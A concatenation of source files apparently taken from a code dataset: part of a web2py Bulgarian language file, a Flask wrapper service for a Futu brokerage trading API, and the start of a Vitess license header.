'ATTENTION: TESTING IS NOT THREAD SAFE SO DO NOT PERFORM MULTIPLE TESTS CONCURRENTLY.': 'ATTENTION: TESTING IS NOT THREAD SAFE SO DO NOT PERFORM MULTIPLE TESTS CONCURRENTLY.',
'ATTENTION: you cannot edit the running application!': 'ATTENTION: you cannot edit the running application!',
'Autocomplete Python Code': 'Autocomplete Python Code',
'Available databases and tables': 'Available databases and tables',
'Available Databases and Tables': 'Available Databases and Tables',
'back': 'back',
'Back to the plugins list': 'Back to the plugins list',
'Back to wizard': 'Back to wizard',
'Basics': 'Basics',
'Begin': 'Begin',
'breakpoint': 'breakpoint',
'Breakpoints': 'Breakpoints',
'breakpoints': 'breakpoints',
'Bulk Register': 'Bulk Register',
'Bulk Student Registration': 'Bulk Student Registration',
'Cache': 'Cache',
'cache': 'cache',
'Cache Cleared': 'Cache Cleared',
'Cache Keys': 'Cache Keys',
'cache, errors and sessions cleaned': 'cache, errors and sessions cleaned',
'can be a git repo': 'can be a git repo',
'Cancel': 'Cancel',
'Cannot be empty': 'Cannot be empty',
'Cannot compile: there are errors in your app. Debug it, correct errors and try again.': 'Cannot compile: there are errors in your app. Debug it, correct errors and try again.',
'Cannot compile: there are errors in your app:': 'Cannot compile: there are errors in your app:',
'cannot create file': 'cannot create file',
'cannot upload file "%(filename)s"': 'cannot upload file "%(filename)s"',
'Change Admin Password': 'Change Admin Password',
'Change admin password': 'change admin password',
'change editor settings': 'change editor settings',
'Changelog': 'Changelog',
'check all': 'check all',
'Check for upgrades': 'check for upgrades',
'Check to delete': 'Check to delete',
'Checking for upgrades...': 'Checking for upgrades...',
'Clean': 'clean',
'Clear': 'Clear',
'Clear CACHE?': 'Clear CACHE?',
'Clear DISK': 'Clear DISK',
'Clear RAM': 'Clear RAM',
'click here for online examples': 'щракни тук за онлайн примери',
'click here for the administrative interface': 'щракни тук за административния интерфейс',
'Click row to expand traceback': 'Click row to expand traceback',
'Click row to view a ticket': 'Click row to view a ticket',
'click to check for upgrades': 'click to check for upgrades',
'code': 'code',
'Code listing': 'Code listing',
'collapse/expand all': 'collapse/expand all',
'Command': 'Command',
'Comment:': 'Comment:',
'Commit': 'Commit',
'Commit form': 'Commit form',
'Committed files': 'Committed files',
'Compile': 'compile',
'Compile (all or nothing)': 'Compile (all or nothing)',
'Compile (skip failed views)': 'Compile (skip failed views)',
'compiled application removed': 'compiled application removed',
'Condition': 'Condition',
'continue': 'continue',
'Controllers': 'Controllers',
'controllers': 'controllers',
'Count': 'Count',
'Create': 'create',
'create file with filename:': 'create file with filename:',
'create new application:': 'create new application:',
'Create new simple application': 'Create new simple application',
'Create/Upload': 'Create/Upload',
'created by': 'created by',
'Created by:': 'Created by:',
'Created On': 'Created On',
'Created on:': 'Created on:',
'crontab': 'crontab',
'Current request': 'Current request',
'Current response': 'Current response',
'Current session': 'Current session',
'currently running': 'currently running',
'currently saved or': 'currently saved or',
'data uploaded': 'данните бяха качени',
'Database': 'Database',
'database': 'database',
'Database %s select': 'Database %s select',
'database %s select': 'database %s select',
'Database administration': 'Database administration',
'database administration': 'database administration',
'Database Administration (appadmin)': 'Database Administration (appadmin)',
'Date and Time': 'Date and Time',
'db': 'дб',
'Debug': 'Debug',
'defines tables': 'defines tables',
'Delete': 'Delete',
'delete': 'delete',
'delete all checked': 'delete all checked',
'delete plugin': 'delete plugin',
'Delete this file (you will be asked to confirm deletion)': 'Delete this file (you will be asked to confirm deletion)',
'Delete:': 'Delete:',
'deleted after first hit': 'deleted after first hit',
'Demo': 'Demo',
'Deploy': 'deploy',
'Deploy on Google App Engine': 'Deploy on Google App Engine',
'Deploy to OpenShift': 'Deploy to OpenShift',
'Deploy to pythonanywhere': 'Deploy to pythonanywhere',
'Deploy to PythonAnywhere': 'Deploy to PythonAnywhere',
'Deployment form': 'Deployment form',
'Deployment Interface': 'Deployment Interface',
'Description:': 'Description:',
'design': 'дизайн',
'DESIGN': 'DESIGN',
'Design for': 'Design for',
'Detailed traceback description': 'Detailed traceback description',
'details': 'details',
'direction: ltr': 'direction: ltr',
'directory not found': 'directory not found',
'Disable': 'Disable',
'Disabled': 'Disabled',
'disabled in demo mode': 'disabled in demo mode',
'disabled in GAE mode': 'disabled in GAE mode',
'disabled in multi user mode': 'disabled in multi user mode',
'DISK': 'DISK',
'Disk Cache Keys': 'Disk Cache Keys',
'Disk Cleared': 'Disk Cleared',
'Display line numbers': 'Display line numbers',
'DO NOT use the "Pack compiled" feature.': 'DO NOT use the "Pack compiled" feature.',
'docs': 'docs',
'Docs': 'Docs',
'done!': 'готово!',
'Downgrade': 'Downgrade',
'Download .w2p': 'Download .w2p',
'Download as .exe': 'Download as .exe',
'download layouts': 'download layouts',
'Download layouts from repository': 'Download layouts from repository',
'download plugins': 'download plugins',
'Download plugins from repository': 'Download plugins from repository',
'EDIT': 'EDIT',
'Edit': 'edit',
'edit all': 'edit all',
'Edit application': 'Edit application',
'edit controller': 'edit controller',
'edit controller:': 'edit controller:',
'Edit current record': 'Edit current record',
'edit views:': 'edit views:',
'Editing %s': 'Editing %s',
'Editing file': 'Editing file',
'Editing file "%s"': 'Editing file "%s"',
'Editing Language file': 'Editing Language file',
'Editing Plural Forms File': 'Editing Plural Forms File',
'Editor': 'Editor',
'Email Address': 'Email Address',
'Enable': 'Enable',
'Enable Close-Tag': 'Enable Close-Tag',
'Enable Code Folding': 'Enable Code Folding',
'Enterprise Web Framework': 'Enterprise Web Framework',
'Error': 'Error',
'Error logs for "%(app)s"': 'Error logs for "%(app)s"',
'Error snapshot': 'Error snapshot',
'Error ticket': 'Error ticket',
'Errors': 'errors',
'Exception %(extype)s: %(exvalue)s': 'Exception %(extype)s: %(exvalue)s',
'Exception %s': 'Exception %s',
'Exception instance attributes': 'Exception instance attributes',
'Exit Fullscreen': 'Exit Fullscreen',
'Expand Abbreviation (html files only)': 'Expand Abbreviation (html files only)',
'export as csv file': 'export as csv file',
'Exports:': 'Exports:',
'exposes': 'exposes',
'exposes:': 'exposes:',
'extends': 'extends',
'failed to compile file because:': 'failed to compile file because:',
'failed to reload module': 'failed to reload module',
'failed to reload module because:': 'failed to reload module because:',
'File': 'File',
'file "%(filename)s" created': 'file "%(filename)s" created',
'file "%(filename)s" deleted': 'file "%(filename)s" deleted',
'file "%(filename)s" uploaded': 'file "%(filename)s" uploaded',
'file "%(filename)s" was not deleted': 'file "%(filename)s" was not deleted',
'file "%s" of %s restored': 'file "%s" of %s restored',
'file changed on disk': 'file changed on disk',
'file does not exist': 'file does not exist',
'file not found': 'file not found',
'file saved on %(time)s': 'file saved on %(time)s',
'file saved on %s': 'file saved on %s',
'filename': 'filename',
'Filename': 'Filename',
'Files added': 'Files added',
'filter': 'filter',
'Find Next': 'Find Next',
'Find Previous': 'Find Previous',
'Form has errors': 'Form has errors',
'Frames': 'Frames',
'Functions with no doctests will result in [passed] tests.': 'Functions with no doctests will result in [passed] tests.',
'GAE Email': 'GAE Email',
'GAE Output': 'GAE Output',
'GAE Password': 'GAE Password',
'Generate': 'Generate',
'Get from URL:': 'Get from URL:',
'Git Pull': 'Git Pull',
'Git Push': 'Git Push',
'Globals##debug': 'Globals##debug',
'go!': 'go!',
'Google App Engine Deployment Interface': 'Google App Engine Deployment Interface',
'Google Application Id': 'Google Application Id',
'Goto': 'Goto',
'graph model': 'graph model',
'Graph Model': 'Graph Model',
'Hello World': 'Здравей, свят',
'Help': 'help',
'here': 'here',
'Hide/Show Translated strings': 'Hide/Show Translated strings',
'Highlight current line': 'Highlight current line',
'Hits': 'Hits',
'Home': 'Home',
'honored only if the expression evaluates to true': 'honored only if the expression evaluates to true',
'htmledit': 'htmledit',
'If start the downgrade, be patient, it may take a while to rollback': 'If start the downgrade, be patient, it may take a while to rollback',
'If start the upgrade, be patient, it may take a while to download': 'If start the upgrade, be patient, it may take a while to download',
'If the report above contains a ticket number it indicates a failure in executing the controller, before any attempt to execute the doctests. This is usually due to an indentation error or an error outside function code.\n\t\tA green title indicates that all tests (if defined) passed. In this case test results are not shown.': 'If the report above contains a ticket number it indicates a failure in executing the controller, before any attempt to execute the doctests. This is usually due to an indentation error or an error outside function code.\n\t\tA green title indicates that all tests (if defined) passed. In this case test results are not shown.',
'If the report above contains a ticket number it indicates a failure in executing the controller, before any attempt to execute the doctests. This is usually due to an indentation error or an error outside function code.\nA green title indicates that all tests (if defined) passed. In this case test results are not shown.': 'If the report above contains a ticket number it indicates a failure in executing the controller, before any attempt to execute the doctests. This is usually due to an indentation error or an error outside function code.\nA green title indicates that all tests (if defined) passed. In this case test results are not shown.',
'if your application uses a database other than sqlite you will then have to configure its DAL in pythonanywhere.': 'if your application uses a database other than sqlite you will then have to configure its DAL in pythonanywhere.',
'import': 'import',
'Import/Export': 'Import/Export',
'In development, use the default Rocket webserver that is currently supported by this debugger.': 'In development, use the default Rocket webserver that is currently supported by this debugger.',
'includes': 'includes',
'Indent with tabs': 'Indent with tabs',
'insert new': 'insert new',
'insert new %s': 'insert new %s',
'inspect attributes': 'inspect attributes',
'Install': 'install',
'Installation of %(plugin)s for %(app)s': 'Installation of %(plugin)s for %(app)s',
'Installed applications': 'Installed applications',
'Interaction at %s line %s': 'Interaction at %s line %s',
'Interactive console': 'Interactive console',
'internal error': 'internal error',
'internal error: %s': 'internal error: %s',
'Internal State': 'Internal State',
'Invalid action': 'Invalid action',
'Invalid application name': 'Invalid application name',
'invalid circular reference': 'invalid circular reference',
'Invalid git repository specified.': 'Invalid git repository specified.',
'invalid password': 'invalid password',
'invalid password.': 'invalid password.',
'Invalid Query': 'Невалидна заявка',
'invalid request': 'невалидна заявка',
'Invalid request': 'Invalid request',
'invalid table names (auth_* tables already defined)': 'invalid table names (auth_* tables already defined)',
'invalid ticket': 'invalid ticket',
'Key': 'Key',
'Keyboard shortcuts': 'Keyboard shortcuts',
'kill process': 'kill process',
'language file "%(filename)s" created/updated': 'language file "%(filename)s" created/updated',
'Language files (static strings) updated': 'Language files (static strings) updated',
'languages': 'languages',
'Languages': 'Languages',
'languages updated': 'languages updated',
'Last Revision': 'Last Revision',
'Last saved on:': 'Last saved on:',
'License for': 'License for',
'License:': 'License:',
'Line Nr': 'Line Nr',
'Line number': 'Line number',
'lists by exception': 'lists by exception',
'lists by ticket': 'lists by ticket',
'Loading...': 'Loading...',
'loading...': 'loading...',
'Local Apps': 'Local Apps',
'locals': 'locals',
'Locals##debug': 'Locals##debug',
'Login': 'Login',
'login': 'login',
'Login successful': 'Login successful',
'Login to the Administrative Interface': 'Login to the Administrative Interface',
'Login/Register': 'Login/Register',
'Logout': 'logout',
'lost password': 'lost password',
'Main Menu': 'Main Menu',
'Manage': 'Manage',
'Manage %(action)s': 'Manage %(action)s',
'Manage Access Control': 'Manage Access Control',
'Manage Admin Users/Students': 'Manage Admin Users/Students',
'Manage Cache': 'Manage Cache',
'Manage Students': 'Manage Students',
'Memberships': 'Memberships',
'merge': 'merge',
'Models': 'Models',
'models': 'models',
'Modified On': 'Modified On',
'Modules': 'Modules',
'modules': 'modules',
'Multi User Mode': 'Multi User Mode',
'new application "%s" created': 'new application "%s" created',
'new application "%s" imported': 'new application "%s" imported',
'New Application Wizard': 'New Application Wizard',
'New application wizard': 'New application wizard',
'new plugin installed': 'new plugin installed',
'New plugin installed: %s': 'New plugin installed: %s',
'New Record': 'New Record',
'new record inserted': 'новият запис беше добавен',
'New simple application': 'New simple application',
'next': 'next',
'next %s rows': 'next %s rows',
'next 100 rows': 'next 100 rows',
'NO': 'NO',
'no changes': 'no changes',
'No databases in this application': 'No databases in this application',
'No Interaction yet': 'No Interaction yet',
'no match': 'no match',
'no package selected': 'no package selected',
'no permission to uninstall "%s"': 'no permission to uninstall "%s"',
'Node:': 'Node:',
'Not Authorized': 'Not Authorized',
'Not supported': 'Not supported',
'Note: If you receive an error with github status code of 128, ensure the system and account you are deploying from has a cooresponding ssh key configured in the openshift account.': 'Note: If you receive an error with github status code of 128, ensure the system and account you are deploying from has a cooresponding ssh key configured in the openshift account.',
"On production, you'll have to configure your webserver to use one process and multiple threads to use this debugger.": "On production, you'll have to configure your webserver to use one process and multiple threads to use this debugger.",
'Open new app in new window': 'Open new app in new window',
'OpenShift Deployment Interface': 'OpenShift Deployment Interface',
'OpenShift Output': 'OpenShift Output',
'or alternatively': 'or alternatively',
'Or Get from URL:': 'Or Get from URL:',
'or import from csv file': 'or import from csv file',
'or provide app url:': 'or provide app url:',
'or provide application url:': 'or provide application url:',
'Original/Translation': 'Original/Translation',
'Overview': 'Overview',
'Overwrite installed app': 'overwrite installed app',
'Pack all': 'pack all',
'Pack compiled': 'pack compiled',
'Pack custom': 'Pack custom',
'pack plugin': 'pack plugin',
'PAM authenticated user, cannot change password here': 'PAM authenticated user, cannot change password here',
'password changed': 'password changed',
'Past revisions': 'Past revisions',
'Path to appcfg.py': 'Path to appcfg.py',
'Path to local openshift repo root.': 'Path to local openshift repo root.',
'Peeking at file': 'Peeking at file',
'Permission': 'Permission',
'Permissions': 'Permissions',
'Please': 'Please',
'Please wait, giving pythonanywhere a moment...': 'Please wait, giving pythonanywhere a moment...',
'plugin "%(plugin)s" deleted': 'plugin "%(plugin)s" deleted',
'Plugin "%s" in application': 'Plugin "%s" in application',
'plugin not specified': 'plugin not specified',
'Plugin page': 'Plugin page',
'plugins': 'plugins',
'Plugins': 'Plugins',
'Plural Form #%s': 'Plural Form #%s',
'Plural-Forms:': 'Plural-Forms:',
'Powered by': 'Powered by',
'Preferences saved correctly': 'Preferences saved correctly',
'Preferences saved on session only': 'Preferences saved on session only',
'previous %s rows': 'previous %s rows',
'previous 100 rows': 'previous 100 rows',
'Private files': 'Private files',
'private files': 'private files',
'Project Progress': 'Project Progress',
'Pull': 'Pull',
'Pull failed, certain files could not be checked out. Check logs for details.': 'Pull failed, certain files could not be checked out. Check logs for details.',
'Pull is not possible because you have unmerged files. Fix them up in the work tree, and then try again.': 'Pull is not possible because you have unmerged files. Fix them up in the work tree, and then try again.',
'Push': 'Push',
'Push failed, there are unmerged entries in the cache. Resolve merge issues manually and try again.': 'Push failed, there are unmerged entries in the cache. Resolve merge issues manually and try again.',
'pygraphviz library not found': 'pygraphviz library not found',
'PythonAnywhere Apps': 'PythonAnywhere Apps',
'PythonAnywhere Password': 'PythonAnywhere Password',
'Query:': 'Query:',
'RAM': 'RAM',
'RAM Cache Keys': 'RAM Cache Keys',
'Ram Cleared': 'Ram Cleared',
'Rapid Search': 'Rapid Search',
'Record': 'Record',
'record': 'record',
'record does not exist': 'записът не съществува',
'record id': 'record id',
'Record id': 'Record id',
'refresh': 'refresh',
'register': 'register',
'Reload routes': 'Reload routes',
'Remove compiled': 'remove compiled',
'Removed Breakpoint on %s at line %s': 'Removed Breakpoint on %s at line %s',
'Replace': 'Replace',
'Replace All': 'Replace All',
'Repository (%s)': 'Repository (%s)',
'request': 'request',
'requires distutils, but not installed': 'requires distutils, but not installed',
'requires python-git, but not installed': 'requires python-git, but not installed',
'Resolve Conflict file': 'Resolve Conflict file',
'response': 'response',
'restart': 'restart',
'restore': 'restore',
'return': 'return',
'Revert': 'Revert',
'revert': 'revert',
'reverted to revision %s': 'reverted to revision %s',
'Revision %s': 'Revision %s',
'Revision:': 'Revision:',
'Role': 'Role',
'Roles': 'Roles',
'Rows in table': 'Rows in table',
'Rows in Table': 'Rows in Table',
'Rows selected': 'Rows selected',
'rules are not defined': 'rules are not defined',
'Run tests': 'Run tests',
'Run tests in this file': 'Run tests in this file',
"Run tests in this file (to run all files, you may also use the button labelled 'test')": "Run tests in this file (to run all files, you may also use the button labelled 'test')",
'Running on %s': 'Running on %s',
'Save': 'Save',
'save': 'save',
'Save file:': 'Save file:',
'Save file: %s': 'Save file: %s',
'Save model as...': 'Save model as...',
'Save via Ajax': 'Save via Ajax',
'Saved file hash:': 'Saved file hash:',
'Screenshot %s': 'Screenshot %s',
'Search': 'Search',
'Select Files to Package': 'Select Files to Package',
'selected': 'selected',
'session': 'session',
'session expired': 'session expired',
'Session saved correctly': 'Session saved correctly',
'Session saved on session only': 'Session saved on session only',
'Set Breakpoint on %s at line %s: %s': 'Set Breakpoint on %s at line %s: %s',
'shell': 'shell',
'Showing %s to %s of %s %s found': 'Showing %s to %s of %s %s found',
'Singular Form': 'Singular Form',
'Site': 'site',
'Size of cache:': 'Size of cache:',
'skip to generate': 'skip to generate',
'some files could not be removed': 'some files could not be removed',
'Something went wrong please wait a few minutes before retrying': 'Something went wrong please wait a few minutes before retrying',
'Sorry, could not find mercurial installed': 'Sorry, could not find mercurial installed',
'source : db': 'source : db',
'source : filesystem': 'source : filesystem',
'Start a new app': 'Start a new app',
'Start searching': 'Start searching',
'Start wizard': 'start wizard',
'state': 'състояние',
'Static': 'Static',
'static': 'static',
'Static files': 'Static files',
'Statistics': 'Statistics',
'Step': 'Step',
'step': 'step',
'stop': 'stop',
'submit': 'submit',
'Submit': 'Submit',
'successful': 'successful',
'Sure you want to delete this object?': 'Сигурен ли си, че искаш да изтриеш този обект?',
'switch to : db': 'switch to : db',
'switch to : filesystem': 'switch to : filesystem',
'Tab width (# characters)': 'Tab width (# characters)',
'table': 'table',
'Table': 'Table',
'Temporary': 'Temporary',
'test': 'test',
'Testing application': 'Testing application',
'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.': 'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.',
'The app exists, was created by wizard, continue to overwrite!': 'The app exists, was created by wizard, continue to overwrite!',
'The app exists, was NOT created by wizard, continue to overwrite!': 'The app exists, was NOT created by wizard, continue to overwrite!',
'the application logic, each URL path is mapped in one exposed function in the controller': 'the application logic, each URL path is mapped in one exposed function in the controller',
'The application logic, each URL path is mapped in one exposed function in the controller': 'The application logic, each URL path is mapped in one exposed function in the controller',
'the data representation, define database tables and sets': 'the data representation, define database tables and sets',
'The data representation, define database tables and sets': 'The data representation, define database tables and sets',
'The presentations layer, views are also known as templates': 'The presentations layer, views are also known as templates',
'the presentations layer, views are also known as templates': 'the presentations layer, views are also known as templates',
'Theme': 'Theme',
'There are no controllers': 'There are no controllers',
'There are no models': 'There are no models',
'There are no modules': 'There are no modules',
'There are no plugins': 'There are no plugins',
'There are no private files': 'There are no private files',
'There are no static files': 'There are no static files',
'There are no translators': 'There are no translators',
'There are no translators, only default language is supported': 'There are no translators, only default language is supported',
'There are no views': 'There are no views',
'These files are not served, they are only available from within your app': 'These files are not served, they are only available from within your app',
'These files are served without processing, your images go here': 'These files are served without processing, your images go here',
'these files are served without processing, your images go here': 'these files are served without processing, your images go here',
"This debugger may not work properly if you don't have a threaded webserver or you're using multiple daemon processes.": "This debugger may not work properly if you don't have a threaded webserver or you're using multiple daemon processes.",
'This is an experimental feature and it needs more testing. If you decide to downgrade you do it at your own risk': 'This is an experimental feature and it needs more testing. If you decide to downgrade you do it at your own risk',
'This is an experimental feature and it needs more testing. If you decide to upgrade you do it at your own risk': 'This is an experimental feature and it needs more testing. If you decide to upgrade you do it at your own risk',
'This is the %(filename)s template': 'This is the %(filename)s template',
"This page can commit your changes to an openshift app repo and push them to your cloud instance. This assumes that you've already created the application instance using the web2py skeleton and have that repo somewhere on a filesystem that this web2py instance can access. This functionality requires GitPython installed and on the python path of the runtime that web2py is operating in.": "This page can commit your changes to an openshift app repo and push them to your cloud instance. This assumes that you've already created the application instance using the web2py skeleton and have that repo somewhere on a filesystem that this web2py instance can access. This functionality requires GitPython installed and on the python path of the runtime that web2py is operating in.",
'This page can upload your application to the Google App Engine computing cloud. Mind that you must first create indexes locally and this is done by installing the Google appserver and running the app locally with it once, or there will be errors when selecting records. Attention: deployment may take long time, depending on the network speed. Attention: it will overwrite your app.yaml. DO NOT SUBMIT TWICE.': 'This page can upload your application to the Google App Engine computing cloud. Mind that you must first create indexes locally and this is done by installing the Google appserver and running the app locally with it once, or there will be errors when selecting records. Attention: deployment may take long time, depending on the network speed. Attention: it will overwrite your app.yaml. DO NOT SUBMIT TWICE.',
'this page to see if a breakpoint was hit and debug interaction is required.': 'this page to see if a breakpoint was hit and debug interaction is required.',
'This will pull changes from the remote repo for application "%s"?': 'This will pull changes from the remote repo for application "%s"?',
'This will push changes to the remote repo for application "%s".': 'This will push changes to the remote repo for application "%s".',
'Ticket': 'Ticket',
'Ticket ID': 'Ticket ID',
'Ticket Missing': 'Ticket Missing',
'Time in Cache (h:m:s)': 'Time in Cache (h:m:s)',
'TM': 'TM',
'to previous version.': 'to previous version.',
'To create a plugin, name a file/folder plugin_[name]': 'To create a plugin, name a file/folder plugin_[name]',
'To emulate a breakpoint programatically, write:': 'To emulate a breakpoint programatically, write:',
'to use the debugger!': 'to use the debugger!',
'toggle breakpoint': 'toggle breakpoint',
'Toggle comment': 'Toggle comment',
'Toggle Fullscreen': 'Toggle Fullscreen',
'Traceback': 'Traceback',
'translation strings for the application': 'translation strings for the application',
'Translation strings for the application': 'Translation strings for the application',
'try': 'try',
'try something like': 'try something like',
'Try the mobile interface': 'Try the mobile interface',
'try view': 'try view',
'Type PDB debugger command in here and hit Return (Enter) to execute it.': 'Type PDB debugger command in here and hit Return (Enter) to execute it.',
'Type some Python code in here and hit Return (Enter) to execute it.': 'Type some Python code in here and hit Return (Enter) to execute it.',
'Unable to check for upgrades': 'Unable to check for upgrades',
'unable to create application "%s"': 'unable to create application "%s"',
'unable to delete file "%(filename)s"': 'unable to delete file "%(filename)s"',
'unable to delete file plugin "%(plugin)s"': 'unable to delete file plugin "%(plugin)s"',
'Unable to determine the line number!': 'Unable to determine the line number!',
'Unable to download': 'Unable to download',
'Unable to download app because:': 'Unable to download app because:',
'Unable to download because': 'Unable to download because',
'unable to download layout': 'unable to download layout',
'unable to download plugin: %s': 'unable to download plugin: %s',
'Unable to download the list of plugins': 'Unable to download the list of plugins',
'unable to install plugin "%s"': 'unable to install plugin "%s"',
'unable to parse csv file': 'не е възможна обработката на csv файла',
'unable to uninstall "%s"': 'unable to uninstall "%s"',
'unable to upgrade because "%s"': 'unable to upgrade because "%s"',
'uncheck all': 'uncheck all',
'Uninstall': 'uninstall',
'Unsupported webserver working mode: %s': 'Unsupported webserver working mode: %s',
'update': 'update',
'update all languages': 'update all languages',
'Update:': 'Update:',
'Upgrade': 'Upgrade',
'upgrade now to %s': 'upgrade now to %s',
'upgrade web2py now': 'upgrade web2py now',
'upload': 'upload',
'Upload': 'Upload',
'Upload & install packed application': 'Upload & install packed application',
'Upload a package:': 'Upload a package:',
'Upload and install packed application': 'Upload and install packed application',
'upload application:': 'upload application:',
'Upload existing application': 'Upload existing application',
'upload file:': 'upload file:',
'upload plugin file:': 'upload plugin file:',
'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.': 'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.',
'Use an url:': 'Use an url:',
'User': 'User',
'Username': 'Username',
'Users': 'Users',
'Using the shell may lock the database to other users of this app.': 'Using the shell may lock the database to other users of this app.',
'variables': 'variables',
'Version': 'Version',
'Versioning': 'Versioning',
'versioning': 'versioning',
'view': 'view',
'Views': 'Views',
'views': 'views',
'Warning!': 'Warning!',
'WARNING:': 'WARNING:',
'WARNING: The following views could not be compiled:': 'WARNING: The following views could not be compiled:',
'Web Framework': 'Web Framework',
'web2py Admin Password': 'web2py Admin Password',
'web2py apps to deploy': 'web2py apps to deploy',
'web2py Debugger': 'web2py Debugger',
'web2py downgrade': 'web2py downgrade',
'web2py is up to date': 'web2py is up to date',
'web2py online debugger': 'web2py online debugger',
'web2py Recent Tweets': 'web2py Recent Tweets',
'web2py upgrade': 'web2py upgrade',
'web2py upgraded; please restart it': 'web2py upgraded; please restart it',
'Welcome to web2py': 'Добре дошъл в web2py',
'Working...': 'Working...',
'WSGI reference name': 'WSGI reference name',
'YES': 'YES',
'Yes': 'Yes',
'You can also set and remove breakpoint in the edit window, using the Toggle Breakpoint button': 'You can also set and remove breakpoint in the edit window, using the Toggle Breakpoint button',
'You can inspect variables using the console below': 'You can inspect variables using the console below',
'You have one more login attempt before you are locked out': 'You have one more login attempt before you are locked out',
'You need to set up and reach a': 'You need to set up and reach a',
'You only need these if you have already registered': 'You only need these if you have already registered',
'Your application will be blocked until you click an action button (next, step, continue, etc.)': 'Your application will be blocked until you click an action button (next, step, continue, etc.)',
}
| xiang12835/python_web | py2_web2py/web2py/applications/admin/languages/bg.py | Python | apache-2.0 | 35,738 |
# -*- coding: utf-8 -*-
from flask import Flask, jsonify, request, abort, make_response
from futu_server_api import *
from db import save_update_token
from db import delete_tokens
from db import list_cards
import logging
import logging.config
import json
app = Flask(__name__)
logging.config.fileConfig('./conf/log.ini')
no_db_logger = logging.getLogger()
def check_parameters(pjson):
if not pjson or not 'app_account' in pjson or not 'card' in pjson or not 'appid' in pjson:
no_db_logger.info('No Parameter')
abort(400)
cli = {'account':pjson['app_account'], 'card':pjson['card'], 'appid':pjson['appid']}
return client(cli['account'], cli['card'], cli['appid'])
def log_handler(myjson, mytitle):
if 'ClientWarning' in myjson:
return '%s' % myjson['ClientWarning']
elif myjson['result_code'] == 0:
return 'SUCCESS'
else:
return 'FAIL ,REASON OF FAILURE:%s ,PARAMETER:%s' % (myjson['error_msg'], request.json)
@app.route('/')
def hello_world():
no_db_logger.info('server start#####')
return 'hello 22222222 world!'
@app.route('/api/v1/tradetoken', methods=['POST'])
def trade_token():
trade_pswd = request.json['trade_pswd']
account = request.json['app_account']
card = request.json['card']
appid = request.json['appid']
cc = check_parameters(request.json)
message = cc.get_trade_token(trade_pswd)
if message['result_code'] != 0 and message['error_msg'] == 'didn\'t get accesstoken':
no_db_logger.info('didn\'t get accesstoken')
return json.dumps({'result_code':2,'error_msg':'didn\'t get accesstoken'}, ensure_ascii=False)
if message['result_code'] == 0:
token = message['data']['trade_token']
save_update_token(account, appid, None, token, card, True)
return jsonify(**message)
@app.route('/api/v1/account', methods=['POST'])
def get_account_detail():
cc = check_parameters(request.json)
message = cc.get_account_detail()
logtext = log_handler(message, '获取账户信息')
no_db_logger.info(logtext)
return json.dumps(message, ensure_ascii=False)
@app.route('/api/v1/account/cash', methods=['POST'])
def get_account_cash():
cc = check_parameters(request.json)
message = cc.get_account_cash()
logtext = log_handler(message, '获取账户现金')
no_db_logger.info(logtext)
return json.dumps(message, ensure_ascii=False)
@app.route('/api/v1/account/portfolio', methods=['POST'])
def get_account_portfolio():
cc = check_parameters(request.json)
message = cc.get_account_portfolio()
logtext = log_handler(message, '获取账户持仓')
no_db_logger.info(logtext)
return json.dumps(message, ensure_ascii=False)
@app.route('/api/v1/get_list_orders', methods=['POST'])
def get_list_orders():
date_begin = request.json['date_begin']
date_end = request.json['date_end']
cc = check_parameters(request.json)
message = cc.get_list_orders()
logtext = log_handler(message, '获取订单列表')
no_db_logger.info(logtext)
return json.dumps(message, ensure_ascii=False)
@app.route('/api/v1/get_list_trades', methods=['POST'])
def get_list_trades():
cc = check_parameters(request.json)
message = cc.get_list_trades()
logtext = log_handler(message, '获取交易列表')
no_db_logger.info(logtext)
return json.dumps(message, ensure_ascii=False)
@app.route('/api/v1/place_order', methods=['POST'])
def place_order():
code = request.json['code']
quantity = request.json['quantity']
price = request.json['price']
side = request.json['side']
ltype = request.json['type']
cc = check_parameters(request.json)
message = cc.place_order(code, quantity, price, side, ltype)
logtext = log_handler(message, '下单')
no_db_logger.info(logtext)
return json.dumps(message, ensure_ascii=False)
@app.route('/api/v1/change_order', methods=['POST'])
def change_order():
order_id = request.json['order_id']
quantity = request.json['quantity']
price = request.json['price']
cc = check_parameters(request.json)
message = cc.change_order(order_id, quantity, price)
logtext = log_handler(message, '改单')
no_db_logger.info(logtext)
return json.dumps(message, ensure_ascii=False)
@app.route('/api/v1/cancle_order', methods=['POST'])
def cancle_order():
order_id = request.json['order_id']
cc = check_parameters(request.json)
message = cc.cancel_order(order_id)
logtext = log_handler(message, '撤单')
no_db_logger.info(logtext)
return json.dumps(message, ensure_ascii=False)
@app.route('/ap1/v1/save_token', methods=['POST'])
def save_token():
account = request.json['app_account']
appid = request.json['appid']
market = request.json['market']
token = request.json['token']
card = request.json['card']
card_desc = request.json['text']
DB_result = save_update_token(account, appid, market, token, card, False, card_desc)
if DB_result == 'success':
no_db_logger.info('token save success')
return json.dumps({'result_code':0,'error_msg':''}, ensure_ascii=False)
else:
no_db_logger.info('token save fail')
return json.dumps({'result_code':1,'error_msg':'token保存失败'}, ensure_ascii=False)
@app.route('/api/v1/delete_token', methods=['POST'])
def delete_token():
appid = request.json['appid']
account = request.json['app_account']
DB_result = delete_tokens(account, appid)
if DB_result == 'success':
no_db_logger.info('token delete success')
return json.dumps({'result_code':0,'error_msg':''}, ensure_ascii=False)
else:
no_db_logger.info('token delete fail')
return json.dumps({'result_code':1,'error_msg':'token删除失败'}, ensure_ascii=False)
@app.route('/api/v1/list_card', methods=['POST'])
def list_card():
appid = request.json['appid']
account = request.json['app_account']
cards = list_cards(account, appid)
message = dict(cards=cards)
if isinstance(cards, list):
no_db_logger.info('list cards success')
return json.dumps({'result_code':0,'error_msg':'','data':message}, ensure_ascii=False)
else:
no_db_logger.info('list cards fail')
return json.dumps({'result_code':1,'error_msg':'查询账户卡号失败'}, ensure_ascii=False)
if __name__ == '__main__':
app.run()
| zznn/futu-openAPI | app/mainapp.py | Python | apache-2.0 | 6,014 |
#!/usr/bin/env python
# Copyright 2017 The Vitess Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
